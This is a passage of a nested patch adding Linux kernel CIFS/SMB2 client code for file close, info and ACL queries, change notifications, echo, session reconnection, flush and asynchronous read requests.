++			     &rqst, persistent_fid, volatile_fid,
++			     query_attrs);
++	if (rc)
++		goto close_exit;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_close_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_CLOSE_HE);
++		trace_smb3_close_err(xid, persistent_fid, tcon->tid, ses->Suid,
++				     rc);
++		goto close_exit;
++	} else {
++		trace_smb3_close_done(xid, persistent_fid, tcon->tid,
++				      ses->Suid);
++		/*
++		 * Note that have to subtract 4 since struct network_open_info
++		 * has a final 4 byte pad that close response does not have
++		 */
++		if (pbuf)
++			memcpy(pbuf, (char *)&rsp->CreationTime, sizeof(*pbuf) - 4);
++	}
++
++	atomic_dec(&tcon->num_remote_opens);
++close_exit:
++	SMB2_close_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++
++	/* retry close in a worker thread if this one is interrupted */
++	if (is_interrupt_error(rc)) {
++		int tmp_rc;
++
++		tmp_rc = smb2_handle_cancelled_close(tcon, persistent_fid,
++						     volatile_fid);
++		if (tmp_rc)
++			cifs_dbg(VFS, "handle cancelled close fid 0x%llx returned error %d\n",
++				 persistent_fid, tmp_rc);
++	}
++	return rc;
++}
++
++int
++SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid)
++{
++	return __SMB2_close(xid, tcon, persistent_fid, volatile_fid, NULL);
++}
++
++int
++smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
++		  struct kvec *iov, unsigned int min_buf_size)
++{
++	unsigned int smb_len = iov->iov_len;
++	char *end_of_smb = smb_len + (char *)iov->iov_base;
++	char *begin_of_buf = offset + (char *)iov->iov_base;
++	char *end_of_buf = begin_of_buf + buffer_length;
++
++
++	if (buffer_length < min_buf_size) {
++		cifs_dbg(VFS, "buffer length %d smaller than minimum size %d\n",
++			 buffer_length, min_buf_size);
++		return -EINVAL;
++	}
++
++	/* check if beyond RFC1001 maximum length */
++	if ((smb_len > 0x7FFFFF) || (buffer_length > 0x7FFFFF)) {
++		cifs_dbg(VFS, "buffer length %d or smb length %d too large\n",
++			 buffer_length, smb_len);
++		return -EINVAL;
++	}
++
++	if ((begin_of_buf > end_of_smb) || (end_of_buf > end_of_smb)) {
++		cifs_dbg(VFS, "Invalid server response, bad offset to data\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++/*
++ * If SMB buffer fields are valid, copy into temporary buffer to hold result.
++ * Caller must free buffer.
++ */
++int
++smb2_validate_and_copy_iov(unsigned int offset, unsigned int buffer_length,
++			   struct kvec *iov, unsigned int minbufsize,
++			   char *data)
++{
++	char *begin_of_buf = offset + (char *)iov->iov_base;
++	int rc;
++
++	if (!data)
++		return -EINVAL;
++
++	rc = smb2_validate_iov(offset, buffer_length, iov, minbufsize);
++	if (rc)
++		return rc;
++
++	memcpy(data, begin_of_buf, minbufsize);
++
++	return 0;
++}
++
++int
++SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		     struct smb_rqst *rqst,
++		     u64 persistent_fid, u64 volatile_fid,
++		     u8 info_class, u8 info_type, u32 additional_info,
++		     size_t output_len, size_t input_len, void *input)
++{
++	struct smb2_query_info_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->InfoType = info_type;
++	req->FileInfoClass = info_class;
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	req->AdditionalInformation = cpu_to_le32(additional_info);
++
++	req->OutputBufferLength = cpu_to_le32(output_len);
++	if (input_len) {
++		req->InputBufferLength = cpu_to_le32(input_len);
++		/* total_len for smb query request never close to le16 max */
++		req->InputBufferOffset = cpu_to_le16(total_len - 1);
++		memcpy(req->Buffer, input, input_len);
++	}
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1 + input_len;
++	return 0;
++}
++
++void
++SMB2_query_info_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++static int
++query_info(const unsigned int xid, struct cifs_tcon *tcon,
++	   u64 persistent_fid, u64 volatile_fid, u8 info_class, u8 info_type,
++	   u32 additional_info, size_t output_len, size_t min_len, void **data,
++		u32 *dlen)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype = CIFS_NO_BUFFER;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server;
++	int flags = 0;
++	bool allocated = false;
++
++	cifs_dbg(FYI, "Query Info\n");
++
++	if (!ses)
++		return -EIO;
++	server = cifs_pick_channel(ses);
++	if (!server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = SMB2_query_info_init(tcon, server,
++				  &rqst, persistent_fid, volatile_fid,
++				  info_class, info_type, additional_info,
++				  output_len, 0, NULL);
++	if (rc)
++		goto qinf_exit;
++
++	trace_smb3_query_info_enter(xid, persistent_fid, tcon->tid,
++				    ses->Suid, info_class, (__u32)info_type);
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		trace_smb3_query_info_err(xid, persistent_fid, tcon->tid,
++				ses->Suid, info_class, (__u32)info_type, rc);
++		goto qinf_exit;
++	}
++
++	trace_smb3_query_info_done(xid, persistent_fid, tcon->tid,
++				ses->Suid, info_class, (__u32)info_type);
++
++	if (dlen) {
++		*dlen = le32_to_cpu(rsp->OutputBufferLength);
++		if (!*data) {
++			*data = kmalloc(*dlen, GFP_KERNEL);
++			if (!*data) {
++				cifs_tcon_dbg(VFS,
++					"Error %d allocating memory for acl\n",
++					rc);
++				*dlen = 0;
++				rc = -ENOMEM;
++				goto qinf_exit;
++			}
++			allocated = true;
++		}
++	}
++
++	rc = smb2_validate_and_copy_iov(le16_to_cpu(rsp->OutputBufferOffset),
++					le32_to_cpu(rsp->OutputBufferLength),
++					&rsp_iov, dlen ? *dlen : min_len, *data);
++	if (rc && allocated) {
++		kfree(*data);
++		*data = NULL;
++		*dlen = 0;
++	}
++
++qinf_exit:
++	SMB2_query_info_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++	u64 persistent_fid, u64 volatile_fid, struct smb2_file_all_info *data)
++{
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  FILE_ALL_INFORMATION, SMB2_O_INFO_FILE, 0,
++			  sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
++			  sizeof(struct smb2_file_all_info), (void **)&data,
++			  NULL);
++}
++
++#if 0
++/* currently unused, as now we are doing compounding instead (see smb311_posix_query_path_info) */
++int
++SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen)
++{
++	size_t output_len = sizeof(struct smb311_posix_qinfo *) +
++			(sizeof(struct cifs_sid) * 2) + (PATH_MAX * 2);
++	*plen = 0;
++
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  SMB_FIND_FILE_POSIX_INFO, SMB2_O_INFO_FILE, 0,
++			  output_len, sizeof(struct smb311_posix_qinfo), (void **)&data, plen);
++	/* Note caller must free "data" (passed in above). It may be allocated in query_info call */
++}
++#endif
++
++int
++SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
++	       u64 persistent_fid, u64 volatile_fid,
++	       void **data, u32 *plen, u32 extra_info)
++{
++	__u32 additional_info = OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
++				extra_info;
++	*plen = 0;
++
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  0, SMB2_O_INFO_SECURITY, additional_info,
++			  SMB2_MAX_BUFFER_SIZE, MIN_SEC_DESC_LEN, data, plen);
++}
++
++int
++SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
++		 u64 persistent_fid, u64 volatile_fid, __le64 *uniqueid)
++{
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  FILE_INTERNAL_INFORMATION, SMB2_O_INFO_FILE, 0,
++			  sizeof(struct smb2_file_internal_info),
++			  sizeof(struct smb2_file_internal_info),
++			  (void **)&uniqueid, NULL);
++}
++
++/*
++ * CHANGE_NOTIFY Request is sent to get notifications on changes to a directory
++ * See MS-SMB2 2.2.35 and 2.2.36
++ */
++
++static int
++SMB2_notify_init(const unsigned int xid, struct smb_rqst *rqst,
++		 struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		 u64 persistent_fid, u64 volatile_fid,
++		 u32 completion_filter, bool watch_tree)
++{
++	struct smb2_change_notify_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_CHANGE_NOTIFY, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	/* See note 354 of MS-SMB2, 64K max */
++	req->OutputBufferLength =
++		cpu_to_le32(SMB2_MAX_BUFFER_SIZE - MAX_SMB2_HDR_SIZE);
++	req->CompletionFilter = cpu_to_le32(completion_filter);
++	if (watch_tree)
++		req->Flags = cpu_to_le16(SMB2_WATCH_TREE);
++	else
++		req->Flags = 0;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	return 0;
++}
++
++int
++SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid, bool watch_tree,
++		u32 completion_filter, u32 max_out_data_len, char **out_data,
++		u32 *plen /* returned data len */)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct smb_rqst rqst;
++	struct smb2_change_notify_rsp *smb_rsp;
++	struct kvec iov[1];
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype = CIFS_NO_BUFFER;
++	int flags = 0;
++	int rc = 0;
++
++	cifs_dbg(FYI, "change notify\n");
++	if (!ses || !server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	if (plen)
++		*plen = 0;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = SMB2_notify_init(xid, &rqst, tcon, server,
++			      persistent_fid, volatile_fid,
++			      completion_filter, watch_tree);
++	if (rc)
++		goto cnotify_exit;
++
++	trace_smb3_notify_enter(xid, persistent_fid, tcon->tid, ses->Suid,
++				(u8)watch_tree, completion_filter);
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_CHANGE_NOTIFY_HE);
++		trace_smb3_notify_err(xid, persistent_fid, tcon->tid, ses->Suid,
++				(u8)watch_tree, completion_filter, rc);
++	} else {
++		trace_smb3_notify_done(xid, persistent_fid, tcon->tid,
++			ses->Suid, (u8)watch_tree, completion_filter);
++		/* validate that notify information is plausible */
++		if ((rsp_iov.iov_base == NULL) ||
++		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp)))
++			goto cnotify_exit;
++
++		smb_rsp = (struct smb2_change_notify_rsp *)rsp_iov.iov_base;
++
++		smb2_validate_iov(le16_to_cpu(smb_rsp->OutputBufferOffset),
++				le32_to_cpu(smb_rsp->OutputBufferLength), &rsp_iov,
++				sizeof(struct file_notify_information));
++
++		*out_data = kmemdup((char *)smb_rsp + le16_to_cpu(smb_rsp->OutputBufferOffset),
++				le32_to_cpu(smb_rsp->OutputBufferLength), GFP_KERNEL);
++		if (*out_data == NULL) {
++			rc = -ENOMEM;
++			goto cnotify_exit;
++		} else if (plen)
++			*plen = le32_to_cpu(smb_rsp->OutputBufferLength);
++	}
++
++ cnotify_exit:
++	if (rqst.rq_iov)
++		cifs_small_buf_release(rqst.rq_iov[0].iov_base); /* request */
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++
++
++/*
++ * This is a no-op for now. We're not really interested in the reply, but
++ * rather in the fact that the server sent one and that server->lstrp
++ * gets updated.
++ *
++ * FIXME: maybe we should consider checking that the reply matches request?
++ */
++static void
++smb2_echo_callback(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->callback_data;
++	struct smb2_echo_rsp *rsp = (struct smb2_echo_rsp *)mid->resp_buf;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++
++	if (mid->mid_state == MID_RESPONSE_RECEIVED
++	    || mid->mid_state == MID_RESPONSE_MALFORMED) {
++		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
++		credits.instance = server->reconnect_instance;
++	}
++
++	release_mid(mid);
++	add_credits(server, &credits, CIFS_ECHO_OP);
++}
++
++void smb2_reconnect_server(struct work_struct *work)
++{
++	struct TCP_Server_Info *server = container_of(work,
++					struct TCP_Server_Info, reconnect.work);
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses, *ses2;
++	struct cifs_tcon *tcon, *tcon2;
++	struct list_head tmp_list, tmp_ses_list;
++	bool tcon_exist = false, ses_exist = false;
++	bool tcon_selected = false;
++	int rc;
++	bool resched = false;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/* Prevent simultaneous reconnects that can corrupt tcon->rlist list */
++	mutex_lock(&pserver->reconnect_mutex);
++
++	INIT_LIST_HEAD(&tmp_list);
++	INIT_LIST_HEAD(&tmp_ses_list);
++	cifs_dbg(FYI, "Reconnecting tcons and channels\n");
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++
++		tcon_selected = false;
++
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			if (tcon->need_reconnect || tcon->need_reopen_files) {
++				tcon->tc_count++;
++				list_add_tail(&tcon->rlist, &tmp_list);
++				tcon_selected = tcon_exist = true;
++			}
++		}
++		/*
++		 * IPC has the same lifetime as its session and uses its
++		 * refcount.
++		 */
++		if (ses->tcon_ipc && ses->tcon_ipc->need_reconnect) {
++			list_add_tail(&ses->tcon_ipc->rlist, &tmp_list);
++			tcon_selected = tcon_exist = true;
++			ses->ses_count++;
++		}
++		/*
++		 * handle the case where channel needs to reconnect
++		 * binding session, but tcon is healthy (some other channel
++		 * is active)
++		 */
++		spin_lock(&ses->chan_lock);
++		if (!tcon_selected && cifs_chan_needs_reconnect(ses, server)) {
++			list_add_tail(&ses->rlist, &tmp_ses_list);
++			ses_exist = true;
++			ses->ses_count++;
++		}
++		spin_unlock(&ses->chan_lock);
++	}
++	/*
++	 * Get the reference to server struct to be sure that the last call of
++	 * cifs_put_tcon() in the loop below won't release the server pointer.
++	 */
++	if (tcon_exist || ses_exist)
++		server->srv_count++;
++
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	list_for_each_entry_safe(tcon, tcon2, &tmp_list, rlist) {
++		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
++		if (!rc)
++			cifs_reopen_persistent_handles(tcon);
++		else
++			resched = true;
++		list_del_init(&tcon->rlist);
++		if (tcon->ipc)
++			cifs_put_smb_ses(tcon->ses);
++		else
++			cifs_put_tcon(tcon);
++	}
++
++	if (!ses_exist)
++		goto done;
++
++	/* allocate a dummy tcon struct used for reconnect */
++	tcon = tconInfoAlloc();
++	if (!tcon) {
++		resched = true;
++		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
++			list_del_init(&ses->rlist);
++			cifs_put_smb_ses(ses);
++		}
++		goto done;
++	}
++
++	tcon->status = TID_GOOD;
++	tcon->retry = false;
++	tcon->need_reconnect = false;
++
++	/* now reconnect sessions for necessary channels */
++	list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
++		tcon->ses = ses;
++		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
++		if (rc)
++			resched = true;
++		list_del_init(&ses->rlist);
++		cifs_put_smb_ses(ses);
++	}
++	tconInfoFree(tcon);
++
++done:
++	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
++	if (resched)
++		queue_delayed_work(cifsiod_wq, &server->reconnect, 2 * HZ);
++	mutex_unlock(&pserver->reconnect_mutex);
++
++	/* now we can safely release srv struct */
++	if (tcon_exist || ses_exist)
++		cifs_put_tcp_session(server, 1);
++}
++
++int
++SMB2_echo(struct TCP_Server_Info *server)
++{
++	struct smb2_echo_req *req;
++	int rc = 0;
++	struct kvec iov[1];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 1 };
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "In echo request for conn_id %lld\n", server->conn_id);
++
++	spin_lock(&server->srv_lock);
++	if (server->ops->need_neg &&
++	    server->ops->need_neg(server)) {
++		spin_unlock(&server->srv_lock);
++		/* No need to send echo on newly established connections */
++		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++		return rc;
++	}
++	spin_unlock(&server->srv_lock);
++
++	rc = smb2_plain_req_init(SMB2_ECHO, NULL, server,
++				 (void **)&req, &total_len);
++	if (rc)
++		return rc;
++
++	req->hdr.CreditRequest = cpu_to_le16(1);
++
++	iov[0].iov_len = total_len;
++	iov[0].iov_base = (char *)req;
++
++	rc = cifs_call_async(server, &rqst, NULL, smb2_echo_callback, NULL,
++			     server, CIFS_ECHO_OP, NULL);
++	if (rc)
++		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
++
++	cifs_small_buf_release(req);
++	return rc;
++}
++
++void
++SMB2_flush_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++int
++SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
++		struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		u64 persistent_fid, u64 volatile_fid)
++{
++	struct smb2_flush_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_FLUSH, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	return 0;
++}
++
++int
++SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
++	   u64 volatile_fid)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct smb_rqst rqst;
++	struct kvec iov[1];
++	struct kvec rsp_iov = {NULL, 0};
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int resp_buftype = CIFS_NO_BUFFER;
++	int flags = 0;
++	int rc = 0;
++
++	cifs_dbg(FYI, "flush\n");
++	if (!ses || !(ses->server))
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = SMB2_flush_init(xid, &rqst, tcon, server,
++			     persistent_fid, volatile_fid);
++	if (rc)
++		goto flush_exit;
++
++	trace_smb3_flush_enter(xid, persistent_fid, tcon->tid, ses->Suid);
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_FLUSH_HE);
++		trace_smb3_flush_err(xid, persistent_fid, tcon->tid, ses->Suid,
++				     rc);
++	} else
++		trace_smb3_flush_done(xid, persistent_fid, tcon->tid,
++				      ses->Suid);
++
++ flush_exit:
++	SMB2_flush_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
++{
++	struct TCP_Server_Info *server = io_parms->server;
++	struct cifs_tcon *tcon = io_parms->tcon;
++
++	/* we can only offload if we're connected */
++	if (!server || !tcon)
++		return false;
++
++	/* we can only offload on an rdma connection */
++	if (!server->rdma || !server->smbd_conn)
++		return false;
++
++	/* we don't support signed offload yet */
++	if (server->sign)
++		return false;
++
++	/* we don't support encrypted offload yet */
++	if (smb3_encryption_required(tcon))
++		return false;
++
++	/* offload also has its overhead, so only do it if desired */
++	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
++		return false;
++
++	return true;
++}
++#endif /* CONFIG_CIFS_SMB_DIRECT */
++
++/*
++ * To form a chain of read requests, any read requests after the first should
++ * have the end_of_chain boolean set to true.
++ */
++static int
++smb2_new_read_req(void **buf, unsigned int *total_len,
++	struct cifs_io_parms *io_parms, struct cifs_readdata *rdata,
++	unsigned int remaining_bytes, int request_type)
++{
++	int rc = -EACCES;
++	struct smb2_read_req *req = NULL;
++	struct smb2_hdr *shdr;
++	struct TCP_Server_Info *server = io_parms->server;
++
++	rc = smb2_plain_req_init(SMB2_READ, io_parms->tcon, server,
++				 (void **) &req, total_len);
++	if (rc)
++		return rc;
++
++	if (server == NULL)
++		return -ECONNABORTED;
++
++	shdr = &req->hdr;
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
++
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
++	req->ReadChannelInfoOffset = 0; /* reserved */
++	req->ReadChannelInfoLength = 0; /* reserved */
++	req->Channel = 0; /* reserved */
++	req->MinimumCount = 0;
++	req->Length = cpu_to_le32(io_parms->length);
++	req->Offset = cpu_to_le64(io_parms->offset);
++
++	trace_smb3_read_enter(0 /* xid */,
++			io_parms->persistent_fid,
++			io_parms->tcon->tid, io_parms->tcon->ses->Suid,
++			io_parms->offset, io_parms->length);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If we want to do a RDMA write, fill in and append
++	 * smbd_buffer_descriptor_v1 to the end of read request
++	 */
++	if (smb3_use_rdma_offload(io_parms)) {
++		struct smbd_buffer_descriptor_v1 *v1;
++		bool need_invalidate = server->dialect == SMB30_PROT_ID;
++
++		rdata->mr = smbd_register_mr(
++				server->smbd_conn, rdata->pages,
++				rdata->nr_pages, rdata->page_offset,
++				rdata->tailsz, true, need_invalidate);
++		if (!rdata->mr)
++			return -EAGAIN;
++
++		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
++		if (need_invalidate)
++			req->Channel = SMB2_CHANNEL_RDMA_V1;
++		req->ReadChannelInfoOffset =
++			cpu_to_le16(offsetof(struct smb2_read_req, Buffer));
++		req->ReadChannelInfoLength =
++			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
++		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
++		v1->offset = cpu_to_le64(rdata->mr->mr->iova);
++		v1->token = cpu_to_le32(rdata->mr->mr->rkey);
++		v1->length = cpu_to_le32(rdata->mr->mr->length);
++
++		*total_len += sizeof(*v1) - 1;
++	}
++#endif
++	if (request_type & CHAINED_REQUEST) {
++		if (!(request_type & END_OF_CHAIN)) {
++			/* next 8-byte aligned request */
++			*total_len = ALIGN(*total_len, 8);
++			shdr->NextCommand = cpu_to_le32(*total_len);
++		} else /* END_OF_CHAIN */
++			shdr->NextCommand = 0;
++		if (request_type & RELATED_REQUEST) {
++			shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
++			/*
++			 * Related requests use info from previous read request
++			 * in chain.
++			 */
++			shdr->SessionId = cpu_to_le64(0xFFFFFFFFFFFFFFFF);
++			shdr->Id.SyncId.TreeId = cpu_to_le32(0xFFFFFFFF);
++			req->PersistentFileId = (u64)-1;
++			req->VolatileFileId = (u64)-1;
++		}
++	}
++	if (remaining_bytes > io_parms->length)
++		req->RemainingBytes = cpu_to_le32(remaining_bytes);
++	else
++		req->RemainingBytes = 0;
++
++	*buf = req;
++	return rc;
++}
++
++static void
++smb2_readv_callback(struct mid_q_entry *mid)
++{
++	struct cifs_readdata *rdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	struct TCP_Server_Info *server = rdata->server;
++	struct smb2_hdr *shdr =
++				(struct smb2_hdr *)rdata->iov[0].iov_base;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++	struct smb_rqst rqst = { .rq_iov = &rdata->iov[1],
++				 .rq_nvec = 1, };
++
++	if (rdata->got_bytes) {
++		rqst.rq_pages = rdata->pages;
++		rqst.rq_offset = rdata->page_offset;
++		rqst.rq_npages = rdata->nr_pages;
++		rqst.rq_pagesz = rdata->pagesz;
++		rqst.rq_tailsz = rdata->tailsz;
++	}
++
++	WARN_ONCE(rdata->server != mid->server,
++		  "rdata server %p != mid server %p",
++		  rdata->server, mid->server);
++
++	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
++		 __func__, mid->mid, mid->mid_state, rdata->result,
++		 rdata->bytes);
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		credits.value = le16_to_cpu(shdr->CreditRequest);
++		credits.instance = server->reconnect_instance;
++		/* result already set, check signature */
++		if (server->sign && !mid->decrypted) {
++			int rc;
++
++			rc = smb2_verify_signature(&rqst, server);
++			if (rc)
++				cifs_tcon_dbg(VFS, "SMB signature verification returned error = %d\n",
++					 rc);
++		}
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		rdata->result = -EAGAIN;
++		if (server->sign && rdata->got_bytes)
++			/* reset bytes number since we can not check a sign */
++			rdata->got_bytes = 0;
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	case MID_RESPONSE_MALFORMED:
++		credits.value = le16_to_cpu(shdr->CreditRequest);
++		credits.instance = server->reconnect_instance;
++		fallthrough;
++	default:
++		rdata->result = -EIO;
++	}
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If this rdata has a memmory registered, the MR can be freed
++	 * MR needs to be freed as soon as I/O finishes to prevent deadlock
++	 * because they have limited number and are used for future I/Os
++	 */
++	if (rdata->mr) {
++		smbd_deregister_mr(rdata->mr);
++		rdata->mr = NULL;
++	}
++#endif
++	if (rdata->result && rdata->result != -ENODATA) {
++		cifs_stats_fail_inc(tcon, SMB2_READ_HE);
++		trace_smb3_read_err(0 /* xid */,
++				    rdata->cfile->fid.persistent_fid,
++				    tcon->tid, tcon->ses->Suid, rdata->offset,
++				    rdata->bytes, rdata->result);
++	} else
++		trace_smb3_read_done(0 /* xid */,
++				     rdata->cfile->fid.persistent_fid,
++				     tcon->tid, tcon->ses->Suid,
++				     rdata->offset, rdata->got_bytes);
++
++	queue_work(cifsiod_wq, &rdata->work);
++	release_mid(mid);
++	add_credits(server, &credits, 0);
++}
++
++/* smb2_async_readv - send an async read, and set up mid to handle result */
++int
++smb2_async_readv(struct cifs_readdata *rdata)
++{
++	int rc, flags = 0;
++	char *buf;
++	struct smb2_hdr *shdr;
++	struct cifs_io_parms io_parms;
++	struct smb_rqst rqst = { .rq_iov = rdata->iov,
++				 .rq_nvec = 1 };
++	struct TCP_Server_Info *server;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
++		 __func__, rdata->offset, rdata->bytes);
++
++	if (!rdata->server)
++		rdata->server = cifs_pick_channel(tcon->ses);
++
++	io_parms.tcon = tlink_tcon(rdata->cfile->tlink);
++	io_parms.server = server = rdata->server;
++	io_parms.offset = rdata->offset;
++	io_parms.length = rdata->bytes;
++	io_parms.persistent_fid = rdata->cfile->fid.persistent_fid;
++	io_parms.volatile_fid = rdata->cfile->fid.volatile_fid;
++	io_parms.pid = rdata->pid;
++
++	rc = smb2_new_read_req(
++		(void **) &buf, &total_len, &io_parms, rdata, 0, 0);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(io_parms.tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	rdata->iov[0].iov_base = buf;
++	rdata->iov[0].iov_len = total_len;
++
++	shdr = (struct smb2_hdr *)buf;
++
++	if (rdata->credits.value > 0) {
++		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(rdata->bytes,
++						SMB2_MAX_BUFFER_SIZE));
++		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
